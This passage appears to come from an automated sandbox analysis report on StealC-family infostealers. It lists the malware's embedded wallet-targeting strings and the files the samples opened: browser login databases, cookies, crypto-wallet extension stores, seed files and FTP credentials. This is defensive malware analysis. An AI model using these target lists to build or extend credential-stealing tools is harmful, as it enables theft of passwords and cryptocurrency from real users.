Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: \Ethereum\
Source: stealc_default2.exe, 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: Exodus
Source: stealc_default2.exe, 00000006.00000002.2615206943.0000000001760000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
Source: stealc_default2.exe, 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: Ethereum
Source: stealc_default2.exe, 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: stealc_default2.exe, 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: MultiDoge
Source: stealc_default2.exe, 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: seed.seco
Source: stealc_default2.exe, 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: keystore
Source: stealc_default2.exe, 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: \Electrum-LTC\wallets\
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\.

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
